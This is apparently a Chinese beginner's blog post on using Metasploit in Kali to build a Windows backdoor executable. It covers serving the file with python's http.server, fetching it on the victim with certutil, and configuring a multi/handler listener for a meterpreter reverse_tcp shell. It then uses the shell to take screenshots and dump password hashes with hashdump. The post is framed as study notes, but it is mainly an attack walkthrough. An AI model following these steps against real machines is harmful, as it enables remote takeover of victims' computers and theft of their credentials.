Kali之metasploit学习

**目标:**尝试使用metasploit制作一个windows 后门(exe文件)

一:使用metasploit生成一个exe安装包。

二、将对应的可执行文件放入到目标机

python3 -m http.server 端口号: 模块化启动一个端口。

**windows 证书管理工具:**certutil ,可以使用它来下载文件。

**例如:**certutil -urlcache -split -f http://目标ip地址:端口号

三、开启metasploit监听msfconsole

msf 的使用法则:

1.使用模块 use

2. 配置模块必选项:set

3.运行模块:run

具体实践步骤如下:

  1. 输入msfconsole进入msf6命令行

2.使用模块 并设置相关参数

bash 复制代码
# 使用 攻击/多重/句柄 
use exploit/multi/handler  

# 和之前生成exe文件的保持一致
# 设置payload
set payload windows/x64/meterpreter/reverse_tcp

# 设置ip 
set lhost 192.168.*.*

# 设置端口
set lport 9000

3.运行run

四、尝试获取目标机(windows)信息

截图命令:screenshot

密码:hashdump (当密码超过8位,且有多种元素,就无法破解了)

相关推荐
小眼睛FPGA4 分钟前
【盘古100Pro+开发板实验例程】FPGA学习 | gamma 变化 | 图像实验指导手册
科技·学习·ai·fpga开发·fpga
subuq29 分钟前
Web3.0 时代的电商系统:区块链如何解决信任与溯源问题?
大数据·网络·学习
袁培宇1 小时前
python学习打卡day40
人工智能·python·学习
2 小时前
JAVA-15 (2025.08.20学习记录)
java·开发语言·学习
im_AMBER2 小时前
学习日志39 python
开发语言·python·学习
艾莉丝努力练剑3 小时前
【C语言16天强化训练】从基础入门到进阶:Day 5
c语言·c++·学习·算法
于越海4 小时前
Python工程师向项目管理转型的深度分析与学习道路规划
笔记·python·学习
Gloria_niki5 小时前
机器学习之数据预处理学习总结
人工智能·学习·机器学习·数据分析
helloyaren7 小时前
Docker Desktop里搭建Redis 8.2.1集群的保姆级教程
redis·学习·集群·cluster
风和日丽 随波逐流7 小时前
java17学习笔记
笔记·学习